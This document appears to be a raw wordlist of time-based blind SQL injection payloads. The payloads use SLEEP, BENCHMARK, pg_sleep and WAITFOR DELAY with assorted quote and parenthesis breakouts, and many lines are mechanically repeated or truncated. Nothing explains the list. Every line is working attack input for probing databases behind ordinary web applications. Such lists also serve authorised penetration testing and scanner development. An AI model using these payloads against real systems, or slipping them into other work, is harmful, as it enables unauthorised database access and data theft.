) or SLEEP(2) = ' ) ) or pg_sleep(2) --
1)) or sleep(2) = '
1)) or sleep(2) = ' or
1)) or sleep(2) = ' or benchmark(10000000,MD5(1))
1) or sleep(2) = '
1) or sleep(2) = ' )
1) or sleep(2) = ' ) or
1) or sleep(2) = ' ) or pg_sleep(2)
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
1) or sleep(2) = ' ) or pg_sleep(2) --
") or SLEEP(2) = '
") or SLEEP(2) = ' or
") or SLEEP(2) = ' or pg_sleep(2)
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' or pg_sleep(2) --
) ; waitfor delay '00:00:05'
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
' AnD SLEEP(2)
' AnD SLEEP(2) #
")) ; waitfor delay '0:0:5'
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5'
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
1)) or SLEEP(2) ANd '
1)) or SLEEP(2) ANd ' ;
1)) or SLEEP(2) ANd ' ; waitfor
1)) or SLEEP(2) ANd ' ; waitfor delay
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05'
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
1)) or SLEEP(2) ANd ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + '
")) or SLEEP(2) + ' ;
")) or SLEEP(2) + ' ; waitfor
")) or SLEEP(2) + ' ; waitfor delay
")) or SLEEP(2) + ' ; waitfor delay '00:00:05'
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
")) or SLEEP(2) + ' ; waitfor delay '00:00:05' #
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = '
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ;
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5'
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ; waitfor delay '0:0:5' --
